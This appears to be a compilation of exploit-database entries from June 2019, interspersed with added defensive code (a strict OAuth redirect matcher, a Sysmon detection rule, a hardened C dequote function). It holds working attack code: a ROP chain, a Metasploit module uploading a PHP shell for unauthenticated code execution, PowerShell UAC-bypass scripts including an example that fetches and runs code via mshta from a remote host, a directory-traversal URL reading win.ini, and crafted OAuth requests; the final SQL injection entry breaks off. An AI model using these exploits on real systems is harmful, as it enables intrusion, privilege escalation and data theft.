# {ssize_t (int, void *, size_t)} 0xb7db06b0 <__GI___libc_read>
#
# gef ropgadget
# pop3ret = 0x402fea

offset = 8220
mprotect = 0xb7dbdfd0     # <mprotect>
read = 0xb7db06b0         # <read>
pop3ret = 0x402fea
target_memory = 0xb7fd4000  # r-xp [vdso]

rop_chain = 'A' * offset
rop_chain += pack('I', mprotect)    # mprotect
rop_chain += pack('I', pop3ret)     # gadget
rop_chain += pack('I', 0xbffdf000)  # arg - void*
rop_chain += pack('I', 0x100000)    # arg size_t
rop_chain += pack('I', 0x7)         # arg int
rop_chain += pack('I', read)
rop_chain += pack('I', 0xbffdf000)  # return stack
rop_chain += pack('I', 0x00)        # arg int fd
rop_chain += pack('I', 0xbffdf000)  # arg void
rop_chain += pack('I', 0x200)       # arg size_t

print rop_chain
-
AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "AROX School-ERP Pro Unauthenticated Remote Code Execution",
      'Description'    => %q(
        This module exploits a command execution vulnerability in AROX School-ERP.
        "import_stud.php" and "upload_fille.php" do not have session control.
        Session start/check functions in Line 8,9,10 are disabled with slashes.
        Therefore an unauthenticated user can execute the command on the system.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
        ],
      'References'     =>
        [
          ['URL', 'http://www.pentest.com.tr/exploits/AROX-School-ERP-Pro-Unauthenticated-RCE-Metasploit.html'],
          ['URL', 'https://sourceforge.net/projects/school-erp-ultimate/'] # Download
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Automatic', {}]],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 17 2019",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, "Base ERP directory path", '/'])
      ]
    )
  end

  def exec(shell)
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_data", "#{shell}") # shell url
    })
  end

  def upload_shell(check)
    fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
    @shell = "#{fname}"

    pdata = Rex::MIME::Message.new
    pdata.add_part("" + payload.encoded, 'application/octet-stream', nil, "form-data; name=\"txtdocname\"; filename=\"#{fname}\"")
    pdata.add_part('Submit', nil, nil, 'form-data; name="btnsubmit"')
    data = pdata.to_s

    res = send_request_cgi({
      'method' => 'POST',
      'data'   => data,
      'agent'  => 'Mozilla',
      'ctype'  => "multipart/form-data; boundary=#{pdata.bound}",
      'uri'    => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_fille.php")
    })

    if res && res.code == 200 && res.body =~ /Successfully/
      print_status("Trying to upload #{fname}")
      return true
    else
      fail_with(Failure::NoAccess, 'Error occurred during uploading!')
      return false
    end
  end

  def exploit
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    if upload_shell(true)
      print_good("Upload successfully.")
      exec(@shell)
    end
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, "greatbritain", "greatbritain", "upload_fille.php")
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    if res && res.code == 200 && res.body =~ /upload_fille.php/
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end
end
-
Spring Security OAuth - Open Redirector
# Exploit Title: Open Redirector in spring-security-oauth2
# Date: 17 June 2019
# Exploit Author: Riemann
# Vendor Homepage: https://spring.io/projects/spring-security-oauth
# Software Link: https://spring.io
# Version: Spring Security OAuth versions 2.3 prior to 2.3.6 - org.springframework.security.oauth:spring-security-oauth2:2.3.3.RELEASE
# Tested on: UBUNTU 16.04 LTS - org.springframework.security.oauth:spring-security-oauth2:2.3.3.RELEASE
# CVE : CVE-2019-11269 | CVE-2019-3778

# Description
Spring Security OAuth versions 2.3 prior to 2.3.6, 2.2 prior to 2.2.5, 2.1 prior to 2.1.5, and 2.0 prior to 2.0.18, as well as older unsupported versions, could be susceptible to an open redirector attack that can leak an authorization code. A malicious user or attacker can craft a request to the authorization endpoint using the authorization code grant type, and specify a manipulated redirection URI via the redirect_uri parameter. This can cause the authorization server to redirect the resource owner user-agent to a URI under the control of the attacker with the leaked authorization code.

#VULNERABILITY:
By manipulating the REDIRECT_URI parameter, an attacker can bypass the validation. The code causing the vulnerability is found in the package org.springframework.security.oauth2.provider.endpoint, in the class DefaultRedirectResolver, whose method obtainMatchingRedirect does not properly validate the requested URI:

/**
 * Attempt to match one of the registered URIs to that of the requested one.
 *
 * @param redirectUris the set of the registered URIs to try and find a match. This cannot be null or empty.
 * @param requestedRedirect the URI used as part of the request
 * @return the matching URI
 * @throws RedirectMismatchException if no match was found
 */
private String obtainMatchingRedirect(Set<String> redirectUris, String requestedRedirect) {
    Assert.notEmpty(redirectUris, "Redirect URIs cannot be empty");

    if (redirectUris.size() == 1 && requestedRedirect == null) {
        return redirectUris.iterator().next();
    }
    for (String redirectUri : redirectUris) {
        if (requestedRedirect != null && redirectMatches(requestedRedirect, redirectUri)) {
            return requestedRedirect;
        }
    }
    throw new RedirectMismatchException("Invalid redirect: " + requestedRedirect
            + " does not match one of the registered values: " + redirectUris.toString());
}

#POC ATTACK VECTOR
The following request, sent by the CLIENT APP after the user has logged in, contains the REDIRECT_URI parameter. The validation is bypassed by simply adding a percent sign, which triggers a redirect instead of the RedirectMismatchException error.

The ORIGINAL REQUEST containing a valid URI:

GET /auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://localhost:8086/login/oauth2/code/ HTTP/1.1

The attacker then changes the URI entirely to another server, adding a percent sign, for example:

GET /auth/oauth/authorize?response_type=code&client_id=R2dpxQ3vPrtfgF72&scope=user_info&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D&redirect_uri=http://%localhost:9000/login/oauth2/code/ HTTP/1.1
Host: localhost:8085
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8085/auth/login
Connection: close
Cookie: JSESSIONID=3394FD89204BE407CB585881755C0828; JSESSIONID=C0F1D5A2F1944DCB43F2BFFA416B7A63
Upgrade-Insecure-Requests: 1

The RESPONSE does not produce the expected OAuth error but redirects the user:

HTTP/1.1 302
Cache-Control: no-store
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Location: http://localhost:8086/login/oauth2/code/?code=4ecsea&state=HPRbfRgJLWdmLMi9KXeLJDesMLfPC3vZ0viEkeIvGuQ%3D
Content-Language: en-US
Content-Length: 0
Date: Mon, 17 Jun 2019 11:06:18 GMT
Connection: close
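The defensive property that matters here is fail-closed matching: a redirect_uri that cannot be parsed cleanly, or that differs from a registered value in any component, must raise the mismatch error rather than fall through to a redirect. The Python below is an added example, not Spring's code or its upstream fix; it mirrors the shape of obtainMatchingRedirect but compares exact canonical forms (scheme, host, port, path, query) after strict parsing, so the `http://%localhost:9000/...` value from the PoC is rejected.

```python
import re
from urllib.parse import urlsplit


class RedirectMismatchException(ValueError):
    """Requested redirect_uri is malformed or does not match a registered URI."""


# A hostname we are willing to redirect to: letters, digits, dots and hyphens only.
HOST_RE = re.compile(r"[a-z0-9](?:[a-z0-9.-]*[a-z0-9])?")


def canonical_redirect(uri: str) -> tuple:
    """Parse strictly and return (scheme, host, port, path, query).
    Anything that is not a clean absolute http(s) URI raises RedirectMismatchException."""
    try:
        parts = urlsplit(uri)
        scheme = parts.scheme.lower()
        host = parts.hostname          # urlsplit lowercases the host
        port = parts.port              # raises ValueError for a non-numeric port
    except ValueError as exc:
        raise RedirectMismatchException(f"unparseable redirect: {uri!r}") from exc
    if scheme not in ("http", "https") or not parts.netloc:
        raise RedirectMismatchException(f"redirect must be an absolute http(s) URI: {uri!r}")
    if parts.username is not None or parts.password is not None:
        raise RedirectMismatchException(f"userinfo not allowed in redirect: {uri!r}")
    if not host or not HOST_RE.fullmatch(host):
        raise RedirectMismatchException(f"invalid host in redirect: {uri!r}")
    if parts.fragment:
        raise RedirectMismatchException(f"fragment not allowed in redirect: {uri!r}")
    if port is None:
        port = 443 if scheme == "https" else 80
    return (scheme, host, port, parts.path, parts.query)


def obtain_matching_redirect(redirect_uris: set, requested_redirect):
    """Same contract as the Java method above, with exact canonical matching."""
    if not redirect_uris:
        raise ValueError("Redirect URIs cannot be empty")
    if len(redirect_uris) == 1 and requested_redirect is None:
        return next(iter(redirect_uris))
    if requested_redirect is None:
        raise RedirectMismatchException("redirect_uri is required when several URIs are registered")
    wanted = canonical_redirect(requested_redirect)   # malformed input fails here, closed
    for registered in redirect_uris:
        if canonical_redirect(registered) == wanted:
            return requested_redirect
    raise RedirectMismatchException(
        f"Invalid redirect: {requested_redirect} does not match one of the registered values: "
        f"{sorted(redirect_uris)}")


def is_accepted(redirect_uris: set, requested_redirect) -> bool:
    """True if the authorization server would honour this redirect_uri."""
    try:
        obtain_matching_redirect(redirect_uris, requested_redirect)
        return True
    except RedirectMismatchException:
        return False


# The client registration from the PoC request above.
REGISTERED = {"http://localhost:8086/login/oauth2/code/"}

if __name__ == "__main__":
    for candidate in ("http://localhost:8086/login/oauth2/code/",
                      "http://%localhost:9000/login/oauth2/code/"):
        print(candidate, "->", "redirect" if is_accepted(REGISTERED, candidate) else "RedirectMismatchException")
```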
-
Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)
Interactive Version:

<#
.SYNOPSIS
    This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
.NOTES
    Function    : SluiHijackBypass
    File Name   : SluiHijackBypass.ps1
    Author      : Gushmazuko
.LINK
    https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1
    Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
.EXAMPLE
    Load "cmd.exe" (By Default used 'arch 64'):
    SluiHijackBypass -command "cmd.exe" -arch 64

    Load "mshta http://192.168.0.30:4444/0HUGN"
    SluiHijackBypass -command "mshta http://192.168.0.30:4444/0HUGN"
#>

function SluiHijackBypass(){
    Param (
        [Parameter(Mandatory=$True)]
        [String]$command,
        [ValidateSet(64,86)]
        [int]$arch = 64
    )

    #Create registry structure
    New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
    Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force

    #Perform the bypass
    switch($arch) {
        64 {
            #x64 shell in Windows x64 | x86 shell in Windows x86
            Start-Process "C:\Windows\System32\slui.exe" -Verb runas
        }
        86 {
            #x86 shell in Windows x64
            C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas"
        }
    }

    #Remove registry structure
    Start-Sleep 3
    Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
}

################################################################################

Non-Interactive Version:

<#
.SYNOPSIS
    Non-interactive version of the script, for direct execution.
    This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
.NOTES
    File Name   : SluiHijackBypass_direct.ps1
    Author      : Gushmazuko
.LINK
    https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass_direct.ps1
    Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
.EXAMPLE
    Load "cmd.exe" (By Default used 'arch 64'):
    powershell -exec bypass .\SluiHijackBypass_direct.ps1
#>

$program = "cmd.exe"

New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $program -Force

#For x64 shell in Windows x64:
Start-Process "C:\Windows\System32\slui.exe" -Verb runas

#For x86 shell in Windows x64:
#C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process "C:\Windows\System32\slui.exe" -Verb runas"

Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
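Both scripts leave the same two traces: a write to the per-user exefile open handler, and a launch of slui.exe (an auto-elevating binary) by the same user moments later. The correlation below is an added example, not part of the scripts above, written against Sysmon-style records (EventID 13 RegistryEvent value set, EventID 1 ProcessCreate); the events are constructed, and it assumes Sysmon renders the current-user hive as `HKU\<SID>\...`.

```python
import re
from datetime import datetime, timedelta

# Per-user exefile handler as Sysmon would render the HKCU write (assumption: HKU\<SID>\...).
HIJACK_KEY_RE = re.compile(
    r"^HKU\\[^\\]+\\Software\\Classes\\exefile\\shell\\open\\command(\\\(Default\))?$",
    re.IGNORECASE,
)


def registry_hijack_events(events: list) -> list:
    """EventID 13 records that set the user-hive exefile open handler."""
    return [e for e in events
            if e["EventID"] == 13 and HIJACK_KEY_RE.match(e["TargetObject"])]


def correlate_slui_hijack(events: list, window: timedelta = timedelta(seconds=60)) -> list:
    """Flag (a) any write to the user-hive exefile handler and (b) a slui.exe start by
    the same user within `window` of such a write. The ProcessCreate's IntegrityLevel
    tells whether the auto-elevation actually happened (High = elevated)."""
    findings = []
    last_write = {}  # user -> most recent hijack write seen
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        if ev["EventID"] == 13 and HIJACK_KEY_RE.match(ev["TargetObject"]):
            last_write[ev["User"]] = ev
            findings.append({
                "severity": "medium",
                "user": ev["User"],
                "reason": "exefile open handler overridden in user hive",
                "handler": ev["Details"],
                "writer": ev["Image"],
            })
        elif ev["EventID"] == 1 and ev["Image"].lower().endswith("\\slui.exe"):
            write = last_write.get(ev["User"])
            if write and ev["UtcTime"] - write["UtcTime"] <= window:
                findings.append({
                    "severity": "high" if ev.get("IntegrityLevel") == "High" else "medium",
                    "user": ev["User"],
                    "reason": "slui.exe launched shortly after exefile handler hijack",
                    "handler": write["Details"],
                    "writer": write["Image"],
                })
    return findings


# Constructed sample events (not captured), in the order an endpoint might emit them.
T0 = datetime(2019, 6, 17, 10, 0, 0)
SAMPLE_EVENTS = [
    # benign slui.exe launch an hour earlier, no handler write before it
    {"EventID": 1, "UtcTime": T0 - timedelta(hours=1), "User": "DESKTOP\\alice",
     "Image": "C:\\Windows\\System32\\slui.exe", "IntegrityLevel": "High"},
    # the scripts' Set-ItemProperty, as Sysmon would log it
    {"EventID": 13, "UtcTime": T0, "User": "DESKTOP\\alice",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\exefile\\shell\\open\\command\\(Default)",
     "Details": "cmd.exe"},
    # the Start-Process slui.exe -Verb runas that follows
    {"EventID": 1, "UtcTime": T0 + timedelta(seconds=2), "User": "DESKTOP\\alice",
     "Image": "C:\\Windows\\System32\\slui.exe", "IntegrityLevel": "High"},
    # unrelated user-hive registry write, must not match
    {"EventID": 13, "UtcTime": T0 + timedelta(seconds=5), "User": "DESKTOP\\alice",
     "Image": "C:\\Windows\\explorer.exe",
     "TargetObject": "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\.txt\\OpenWithProgids\\txtfile",
     "Details": "(Empty)"},
]

if __name__ == "__main__":
    for finding in correlate_slui_hijack(SAMPLE_EVENTS):
        print(finding)
```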
-
Thunderbird ESR < 60.7.XXX - Type Confusion
X41 D-Sec GmbH Security Advisory: X41-2019-004

Type confusion in Thunderbird
=============================
Severity Rating: Medium
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1555646
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11706
CWE: 843
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-004-thunderbird

Summary and Impact
==================
A type confusion has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely, when an attacker sends a specially crafted calendar attachment, and does not require user interaction. It might be used by a remote attacker to crash the process or leak information from the client system via calendar replies.

X41 did not perform a full test or audit on the software.

Product Description
===================
Thunderbird is a free and open source email, newsfeed, chat, and calendaring client that's easy to set up and customize.

Analysis
========
A type confusion in icalproperty.c icaltimezone_get_vtimezone_properties() can be triggered while parsing a malformed calendar attachment. Missing sanity checks allow a TZID property to be parsed as ICALFLOATVALUE while it is later used as a string. The bug manifests as strdup(tzid) being called with tzid containing a bad pointer obtained by casting a float value to char*, which typically means segfaulting by dereferencing a non-mapped memory page.

An attacker might be able to deliver an input file containing specially crafted float values as TZID properties which could point to arbitrary memory positions. Certain conditions could allow exfiltrating information via a calendar reply, or have other undetermined impact.

Proof of Concept
================
A reproducer eml file can be found at https://github.com/x41sec/advisories/tree/master/X41-2019-004

Workarounds
===========
A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in the Thunderbird configuration.

Timeline
========
2019-05-30 Issues reported to the vendor
2019-06-07 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH
====================
X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and IT security consulting and support services are core competencies of X41.
Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47001.zip
-
Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow
X41 D-Sec GmbH Security Advisory: X41-2019-001

Heap-based buffer overflow in Thunderbird
=========================================
Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553814
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11704
CWE: 122
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-001-thunderbird

Summary and Impact
==================
A heap-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely when an attacker sends a specially crafted calendar attachment, and it does not require user interaction. It might be used by a remote attacker to crash the client or to gain remote code execution on the client system.

This issue was initially reported by Brandon Perry here: https://bugzilla.mozilla.org/show_bug.cgi?id=1280832 and fixed in libical upstream, but was never fixed in Thunderbird.

X41 did not perform a full test or audit on the software.

Product Description
===================
Thunderbird is a free and open source email, newsfeed, chat, and calendaring client that is easy to set up and customize.

Analysis
========
A heap-based buffer overflow in icalvalue.c icalmemory_strdup_and_dequote() can be triggered while parsing a calendar attachment containing a malformed or specially crafted string.

```c
static char *icalmemory_strdup_and_dequote(const char *str)
{
    char *out = (char *)malloc(sizeof(char) * strlen(str) + 1);
    char *pout = out;
    // ...
    for (p = str; *p != 0; p++) {
        if (*p == '\\') {
            p++;
            // ...
        } else {
            *pout = *p;
        }
    }
```

Bounds checking in `icalmemory_strdup_and_dequote()` can be bypassed when the input `p` ends with a backslash, which lets an attacker read out of bounds of the input buffer and write out of bounds of a heap-allocated output buffer. The issue manifests in several ways, including out-of-bounds read and write and null-pointer dereference, and frequently leads to heap corruption. It is expected that an attacker can exploit this vulnerability to achieve remote code execution.

Proof of Concept
================
A reproducer eml file can be found at https://github.com/x41sec/advisories/tree/master/X41-2019-001

Workarounds
===========
A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in the Thunderbird configuration.

Timeline
========
2016-06-19 Issue reported by Brandon Perry to the vendor
2019-05-23 Issue reported by X41 D-SEC to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47002.zip
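The trailing-backslash condition from the analysis above, as an added defensive example: a re-implementation of the same dequoting loop written for this page (not libical's or Thunderbird's code) that checks for the terminating NUL before stepping over an escape character, so neither the read from the input nor the write into the output buffer can run past the end. The escape set and the `dequote_safe`/`dequote_equals` names are mine; the sample strings are constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Hardened dequoting of an iCalendar TEXT value (added example, not libical
 * code). Same shape as icalmemory_strdup_and_dequote(): copy `str` into a
 * fresh heap buffer of strlen(str) + 1 bytes while resolving backslash
 * escapes.
 *
 * The vulnerable loop did `p++` after seeing a backslash and then used *p
 * without checking it. With a backslash as the last character that landed
 * on the NUL terminator, the for-loop's own `p++` then stepped past the end
 * of the input and the copy continued until it happened to hit a zero byte,
 * reading beyond `str` and writing beyond `out`.
 *
 * Here a dangling backslash ends the copy instead of being resolved, and
 * the output can never be longer than the input, so the allocation holds.
 */
char *dequote_safe(const char *str)
{
    if (str == NULL) {
        return NULL;
    }
    size_t len = strlen(str);
    char *out = malloc(len + 1);
    if (out == NULL) {
        return NULL;
    }
    char *pout = out;
    for (const char *p = str; *p != '\0'; p++) {
        if (*p != '\\') {
            *pout++ = *p;
            continue;
        }
        /* Look ahead BEFORE advancing: is there anything after the backslash? */
        if (p[1] == '\0') {
            break; /* dangling escape: stop here, never step over the NUL */
        }
        p++;
        switch (*p) {
        case 'n': case 'N': *pout++ = '\n'; break;
        case 't': case 'T': *pout++ = '\t'; break;
        case 'r': case 'R': *pout++ = '\r'; break;
        case 'b': case 'B': *pout++ = '\b'; break;
        case 'f': case 'F': *pout++ = '\f'; break;
        case ';': case ',': case '"': case '\\': *pout++ = *p; break;
        default: *pout++ = ' '; break; /* unknown escape: neutralise to a space */
        }
    }
    *pout = '\0';
    return out;
}

/* Test helper: 1 if dequote_safe(input) equals expected (both NULL also
 * counts as equal), 0 otherwise. Frees the dequoted copy. */
int dequote_equals(const char *input, const char *expected)
{
    char *got = dequote_safe(input);
    if (got == NULL) {
        return expected == NULL;
    }
    int ok = strcmp(got, expected) == 0;
    free(got);
    return ok;
}

int main(void)
{
    /* Constructed samples, including the trailing-backslash shape the
     * advisory describes as the trigger. */
    const char *samples[] = {
        "Lunch\\, then review\\; bring notes", /* escaped separators */
        "Line one\\nLine two",                 /* escaped newline */
        "Trailing backslash\\",                /* dangling escape at end */
        "\\",                                  /* nothing but a dangling escape */
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        char *out = dequote_safe(samples[i]);
        printf("%-36s -> \"%s\"\n", samples[i], out ? out : "(null)");
        free(out);
    }
    return 0;
}
```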
-
Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow
X41 D-Sec GmbH Security Advisory: X41-2019-002

Heap-based buffer overflow in Thunderbird
=========================================
Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553820
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11703
CWE: 122
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird

Summary and Impact
==================
A heap-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely when an attacker sends a specially crafted calendar attachment, and it does not require user interaction. It might be used by a remote attacker to crash the client or to gain remote code execution on the client system.

This issue was initially reported by Brandon Perry here: https://bugzilla.mozilla.org/show_bug.cgi?id=1281041 and fixed in libical upstream, but was never fixed in Thunderbird.

X41 did not perform a full test or audit on the software.

Product Description
===================
Thunderbird is a free and open source email, newsfeed, chat, and calendaring client that is easy to set up and customize.

Analysis
========
A heap-based buffer overflow in icalparser.c parser_get_next_char() can be triggered while parsing a calendar attachment containing a malformed or specially crafted string. The issue initially manifests as an out-of-bounds read, but we do not rule out that it could later lead to an out-of-bounds write. It is expected that an attacker can exploit this vulnerability to achieve remote code execution.

Proof of Concept
================
A reproducer ical file can be found at https://github.com/x41sec/advisories/tree/master/X41-2019-002

Workarounds
===========
A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in the Thunderbird configuration.

Timeline
========
2016-06-20 Issue reported by Brandon Perry to the vendor
2019-05-23 Issues reported to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47003.zip
-
Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow
X41 D-Sec GmbH Security Advisory: X41-2019-003

Stack-based buffer overflow in Thunderbird
==========================================
Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553808
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11705
CWE: 121
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-003-thunderbird

Summary and Impact
==================
A stack-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely when an attacker sends a specially crafted calendar attachment, and it does not require user interaction. It might be used by a remote attacker to crash the client or to gain remote code execution on the client system.

X41 did not perform a full test or audit on the software.

Product Description
===================
Thunderbird is a free and open source email, newsfeed, chat, and calendaring client that is easy to set up and customize.

Analysis
========
A stack-based buffer overflow in icalrecur.c icalrecur_add_bydayrules() can be triggered while parsing a calendar attachment containing a malformed or specially crafted string.

```c
static int icalrecur_add_bydayrules(struct icalrecur_parser *parser, const char *vals)
{
    short *array = parser->rt.by_day;
    // ...
    while (n != 0) {
        // ...
        if (wd != ICAL_NO_WEEKDAY) {
            array[i++] = (short)(sign * (wd + 8 * weekno));
            array[i] = ICAL_RECURRENCE_ARRAY_MAX;
        }
    }
```

Missing sanity checks in `icalrecur_add_bydayrules()` can lead to an out-of-bounds write in `array` when `weekno` takes an invalid value. The issue manifests as an out-of-bounds write to a stack-allocated buffer. It is expected that an attacker can exploit this vulnerability to achieve remote code execution when proper stack smashing mitigations are missing.

Proof of Concept
================
A reproducer eml file can be found at https://github.com/x41sec/advisories/tree/master/X41-2019-003

Workarounds
===========
A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in the Thunderbird configuration.

Timeline
========
2019-05-23 Issues reported to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47004.zip
-
Sahi pro 7.x/8.x - Directory Traversal
# Exploit Title: Sahi pro ( <= 8.x ) Directory traversal
# Date: 17-06-2019
# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
# Vendor Homepage: https://sahipro.com/
# Software Link: https://sahipro.com/downloads-archive/
# Version: 7.x , <= 8.x
# Tested on: Windows 10
# CVE : CVE-2018-20470

Description :
An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view the contents of sensitive files.

POC :
vulnerable URL :
''' replace the ip and port of the remote sahi pro server machine '''
http://<ip>:<port>/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected
-
Sahi pro 8.x - SQL Injection
# Exploit Title: Sahi pro ( <= 8.x ) sensitive information disclosure by SQL injection.
# Date: 17-06-2019
# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
# Vendor Homepage: https://sahipro.com/
# Software Link: https://sahipro.com/downloads-archive/
# Version: 7.x , <= 8.x
# Tested on: Windows 10
# CVE : CVE-2018-20469
# POC-URL : https://barriersec.com/2019/06/cve-2018-20469-sahi-pro/

Description :
An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A parameter in the web reports module is vulnerable to SQL injection. This can be exploited to inject SQL queries and run standard h2 system functions.

POC :
vulnerable URL :
